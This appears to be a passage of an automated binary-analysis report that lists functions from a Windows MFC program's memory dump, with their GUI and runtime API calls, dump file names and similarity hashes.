BitBlt.GDI32(00000001,?,?,?,?,?,?,?,00CC0020), ref: 0041B0C2
#5785.MFC42(00000001,?), ref: 0041B0D6
#2414.MFC42 ref: 0041B0F5
#640.MFC42 ref: 0041B106

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2414#5785#640H_prolog
String ID:
API String ID: 2015940582-0
Opcode ID: f8e96425f1e9b54dfa379753d6609e134242fa4e79ddbebd2c42e32b6343376c
Instruction ID: 7e67f5f6252292a7448f85fda230500000af06dac7329cceb3d80f762977415a
Opcode Fuzzy Hash: f8e96425f1e9b54dfa379753d6609e134242fa4e79ddbebd2c42e32b6343376c
Instruction Fuzzy Hash: 69216F71A00715DFC720DF59D98596BFBF5FF48304B108A2FE4A693650C7B5A940CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00401A64, Relevance: 7.6, APIs: 5, Instructions: 60windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32 ref: 0041589A
GetSubMenu.USER32 ref: 004158A4
#2863.MFC42(00000000), ref: 004158AB
wcscmp.MSVCRT ref: 004158DE
GetMenuItemCount.USER32 ref: 004158F7

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$CountItem$#2863wcscmp
String ID:
API String ID: 1146930863-0
Opcode ID: 5021bd8d4f4893d4d33171acb6141b1abf5e2e58f81299e491efb8b5975721a1
Instruction ID: 1b175a6f941c9a7f1de042a6034f07dbbcce6915603353adc9d08507f724a582
Opcode Fuzzy Hash: 5021bd8d4f4893d4d33171acb6141b1abf5e2e58f81299e491efb8b5975721a1
Instruction Fuzzy Hash: E6115B35304B06DF9720AB69DD85DE7B3E9EF89354300083BF952C3221DB28EC649768

Uniqueness

Uniqueness Score: -1.00%

Function 004016F4, Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040CF3F
#537.MFC42(00008065,?,?), ref: 0040CF73
#535.MFC42(?,?,0000000B,00008065,?,?), ref: 0040CF88
#3811.MFC42(?,?,?,0000000B,00008065,?,?), ref: 0040CF95

Part of subcall function 004013D4: _EH_prolog.MSVCRT ref: 0040E57D
Part of subcall function 004013D4: #6199.MFC42(0044217C), ref: 0040E5AD
Part of subcall function 004013D4: #2642.MFC42(00000000,0044217C), ref: 0040E5BF
Part of subcall function 004013D4: #2642.MFC42(00000000,00000000,0044217C), ref: 0040E5C7
Part of subcall function 004013D4: #537.MFC42(00008077,00000000,00000000,0044217C), ref: 0040E5D4
Part of subcall function 004013D4: #6199.MFC42(?,00008077,00000000,00000000,0044217C), ref: 0040E5E2
Part of subcall function 004013D4: #800.MFC42(?,00008077,00000000,00000000,0044217C), ref: 0040E5EE

#800.MFC42(?), ref: 0040CFD9

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2642#537#6199#800H_prolog$#3811#535
String ID:
API String ID: 1939394606-0
Opcode ID: 603ddffc48f3ba601fd7512a02d6feef20df163958194910af0a9a88a8f1b47f
Instruction ID: 77afd08c10104332181ac93a9068ae01babd8871b8d9953a08c4797a0c1fa349
Opcode Fuzzy Hash: 603ddffc48f3ba601fd7512a02d6feef20df163958194910af0a9a88a8f1b47f
Instruction Fuzzy Hash: 5911B270A10215ABCB05FBA6D912BEEB768AF04308F40052FF012B31D2CF785A0487AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040D223, Relevance: 7.6, APIs: 5, Instructions: 52COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040D228
#535.MFC42(?), ref: 0040D242

Part of subcall function 00401460: _EH_prolog.MSVCRT ref: 0040B53A
Part of subcall function 00401460: #858.MFC42(?), ref: 0040B568
Part of subcall function 00401460: #858.MFC42(?,?), ref: 0040B57A
Part of subcall function 00401460: #800.MFC42(?,?,?), ref: 0040B5A4

#535.MFC42(?), ref: 0040D25C
#3811.MFC42(?,?,?,00000000,?), ref: 0040D289
#800.MFC42(00000000,?,?,?,?,00000000,?), ref: 0040D2A8

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #535#800#858H_prolog$#3811
String ID:
API String ID: 78905526-0
Opcode ID: 82b060337569d726d1fc18a94b1b1da36a573d7cbc7fbca1667d0c0d6852bc2e
Instruction ID: 02b64d9ea387957a8ccff59379b9772f3359005cb61ef303d6d4f32ba13c057f
Opcode Fuzzy Hash: 82b060337569d726d1fc18a94b1b1da36a573d7cbc7fbca1667d0c0d6852bc2e
Instruction Fuzzy Hash: 7F1186B1B10214A7CB04EB66D907AEEBBBDDF44358F00451FF401A32D2CB786A0486AA

Uniqueness

Uniqueness Score: -1.00%

Function 00418979, Relevance: 7.6, APIs: 5, Instructions: 52windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32 ref: 0041898A
GetSubMenu.USER32 ref: 00418994
#2863.MFC42(00000000), ref: 0041899B
wcscmp.MSVCRT ref: 004189BD
GetMenuItemCount.USER32 ref: 004189D6

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$CountItem$#2863wcscmp
String ID:
API String ID: 1146930863-0
Opcode ID: bb9d653a88aeb5f1ca3681e8fc5edd39ed8abd2450b6e3cbfd3110a3f7502303
Instruction ID: 34a0067b4fdf6aae9156632e935f84089fbf6c3facc39a005053fd5e1414b5af
Opcode Fuzzy Hash: bb9d653a88aeb5f1ca3681e8fc5edd39ed8abd2450b6e3cbfd3110a3f7502303
Instruction Fuzzy Hash: E301FDB52006058F93209BA8DD81973B7E8EF443A4300063FF5A2C3221DF24EC50872D

Uniqueness

Uniqueness Score: -1.00%

Function 0041E12C, Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

#2414.MFC42 ref: 0041E140
SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 0041E15C
CreateFontIndirectA.GDI32(?), ref: 0041E191
#1641.MFC42(00000000), ref: 0041E19E
InvalidateRect.USER32(?,00000000,00000001,00000000), ref: 0041E1AC

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1641#2414CreateFontIndirectInfoInvalidateParametersRectSystem
String ID:
API String ID: 1393245127-0
Opcode ID: d3953e66dfac900f1f2f1e4a8482211dab77d309fc6a38903f3dcffd69d6be4f
Instruction ID: 58d24782341713f471b2633919d2767a4d77bae180e962a42cc60537d40b47f9
Opcode Fuzzy Hash: d3953e66dfac900f1f2f1e4a8482211dab77d309fc6a38903f3dcffd69d6be4f
Instruction Fuzzy Hash: A601B9767005049BDB24ABB4EC45BDE7BA5BB84315F10013AFE06DB3C5DA7059488A54

Uniqueness

Uniqueness Score: -1.00%

Function 00425901, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00425906
??0_Lockit@std@@QAE@XZ.MSVCP60 ref: 0042591B
??0_Lockit@std@@QAE@XZ.MSVCP60 ref: 00425931
??1_Lockit@std@@QAE@XZ.MSVCP60 ref: 00425948
??1_Lockit@std@@QAE@XZ.MSVCP60 ref: 00425970

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Lockit@std@@$??0_??1_$H_prolog
String ID:
API String ID: 1159726551-0
Opcode ID: c2c3f23aa928e87042f7ea7dd2b4cdc0f39db3fe072196b935406f7ff84ced72
Instruction ID: 1db9a1fb0827dab34ca47e406cb9819f630c377e740fbcd06d0e6ab9362d90cc
Opcode Fuzzy Hash: c2c3f23aa928e87042f7ea7dd2b4cdc0f39db3fe072196b935406f7ff84ced72
Instruction Fuzzy Hash: 761179B5700411DFC718CF98E8849AAF3B1FF84361BA4442EE096A32A0DB34AD80CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00415818, Relevance: 7.5, APIs: 5, Instructions: 48windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32 ref: 0041582B
GetSubMenu.USER32 ref: 00415835
#2863.MFC42(00000000), ref: 0041583C
GetMenuItemID.USER32(?,00000000), ref: 0041585C
GetMenuItemCount.USER32 ref: 0041586B

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Item$Count$#2863
String ID:
API String ID: 3879678142-0
Opcode ID: c7d5bfcd1fdc3148998d2fdc739292868cf4bc50afedca2198b9846311843a8f
Instruction ID: a6b758a81f9bd9d405fb62b04cbd762c8247f0ffcf1b88cf9afec5bf27cfc8ca
Opcode Fuzzy Hash: c7d5bfcd1fdc3148998d2fdc739292868cf4bc50afedca2198b9846311843a8f
Instruction Fuzzy Hash: EE01AD31200A04EFDB116B6ADD459EBBBA9EFC5760300813BFD65C2220DB35DC61DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041D68A, Relevance: 7.5, APIs: 5, Instructions: 46windowCOMMON

Download Yara Rule

APIs

#1168.MFC42 ref: 0041D692
LoadImageA.USER32 ref: 0041D6A8
SendMessageA.USER32 ref: 0041D6CF
#823.MFC42(00000008), ref: 0041D6D6
SendMessageA.USER32 ref: 0041D6F0

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$#1168#823ImageLoad
String ID:
API String ID: 3475336438-0
Opcode ID: b6bf2ff193f9eff26bc47777c8c3219b5a75dffcec035734e8ba7ec4bff6a66c
Instruction ID: 9522b2d34eeebd10e6a05da00499d623b9b9850fe43b623370b70e0cd46d1411
Opcode Fuzzy Hash: b6bf2ff193f9eff26bc47777c8c3219b5a75dffcec035734e8ba7ec4bff6a66c
Instruction Fuzzy Hash: 2F01DB71750304BBD7149B55DC46F997B68FF08720F104027B204AB2D0DAF5ED009758

Uniqueness

Uniqueness Score: -1.00%

Function 0041D935, Relevance: 7.5, APIs: 5, Instructions: 46windowCOMMON

Download Yara Rule

APIs

#1168.MFC42 ref: 0041D93D
LoadImageA.USER32 ref: 0041D953
SendMessageA.USER32 ref: 0041D97A
#823.MFC42(00000008), ref: 0041D981
SendMessageA.USER32 ref: 0041D99B

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$#1168#823ImageLoad
String ID:
API String ID: 3475336438-0
Opcode ID: ae7a5698e3b75ef8c28a2ce6052d3ccbd428cde4b6ad96782419f59a4c01b89f
Instruction ID: 3452677cfa98b63fb044c12e84fb61f628b0ca24f87d6a7d8ae7865e5a89929c
Opcode Fuzzy Hash: ae7a5698e3b75ef8c28a2ce6052d3ccbd428cde4b6ad96782419f59a4c01b89f
Instruction Fuzzy Hash: 0401D6B2750304BBEB009B55EC46F99BBA8FB08724F10412AB204AB2E0DAF5ED008758

Uniqueness

Uniqueness Score: -1.00%

Function 0041D6FC, Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON

Download Yara Rule

APIs

#1168.MFC42 ref: 0041D703
LoadImageA.USER32 ref: 0041D719
SendMessageA.USER32 ref: 0041D741
#823.MFC42(00000008), ref: 0041D748
SendMessageA.USER32 ref: 0041D762

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$#1168#823ImageLoad
String ID:
API String ID: 3475336438-0
Opcode ID: 046f84c4fc6e99b48a8497cff05184037bee4f8c9cbecaef6a49725e84434e99
Instruction ID: 8868670468919c97fd5282768374553a9ccaa9aab706dc3086545a8e6b806f0b
Opcode Fuzzy Hash: 046f84c4fc6e99b48a8497cff05184037bee4f8c9cbecaef6a49725e84434e99
Instruction Fuzzy Hash: 4E018F76750308BBEB005F65EC46F957B68FB08770F008026BA085B2E0DAF5D8508B54

Uniqueness

Uniqueness Score: -1.00%

Function 0041D9A7, Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON

Download Yara Rule

APIs

#1168.MFC42 ref: 0041D9AE
LoadImageA.USER32 ref: 0041D9C4
SendMessageA.USER32 ref: 0041D9EC
#823.MFC42(00000008), ref: 0041D9F3
SendMessageA.USER32 ref: 0041DA0D

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$#1168#823ImageLoad
String ID:
API String ID: 3475336438-0
Opcode ID: b1a6ffc8620c644a17ff63e685782010eca129760e84e22754bcc30f132d0038
Instruction ID: b9ce801e46bc00b8cd47b45518b931b0ae71709cbad444a031211ba36e8d1175
Opcode Fuzzy Hash: b1a6ffc8620c644a17ff63e685782010eca129760e84e22754bcc30f132d0038
Instruction Fuzzy Hash: 89018F75750304BBDB105F65EC46F99BF68FF09770F008026BA085B2E1CAF5E8008754

Uniqueness

Uniqueness Score: -1.00%

Function 004019CE, Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00425864
??0_Lockit@std@@QAE@XZ.MSVCP60 ref: 00425872
#823.MFC42(00000018), ref: 00425889
#823.MFC42(00000018), ref: 004258AE
??1_Lockit@std@@QAE@XZ.MSVCP60 ref: 004258CC

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #823Lockit@std@@$??0_??1_H_prolog
String ID:
API String ID: 2071470728-0
Opcode ID: 498969648c3d3ace19ecea3fa0cd28a8d800c73fb2ed250426fed9c995fa031a
Instruction ID: c29aeca98d192fb348ee8ddf8e685ab52b93dabf7ef1197b15d1f215852958f1
Opcode Fuzzy Hash: 498969648c3d3ace19ecea3fa0cd28a8d800c73fb2ed250426fed9c995fa031a
Instruction Fuzzy Hash: 380180B5A006109FC304DF59E949A69FBF0FF89314B51806FE429D72A2C7B48900CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401D89, Relevance: 7.5, APIs: 5, Instructions: 41windowCOMMON

Download Yara Rule

APIs

#3797.MFC42 ref: 00411AE0
#4284.MFC42(00000000,02000000,00000000), ref: 00411B0F
#4284.MFC42(00000200,00000000,00000000,00000000,02000000,00000000), ref: 00411B19
PostMessageA.USER32 ref: 00411B2F
#2379.MFC42 ref: 00411B37

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4284$#2379#3797MessagePost
String ID:
API String ID: 3634696422-0
Opcode ID: 4fbf6d816ef8624aeb0afeb015804ddd167e48706f5530b522ddba9a78dc28a2
Instruction ID: 51b6efe0563dd75b1d19e05d2584217b14d26420cd3bb52d914f4972d7d031e9
Opcode Fuzzy Hash: 4fbf6d816ef8624aeb0afeb015804ddd167e48706f5530b522ddba9a78dc28a2
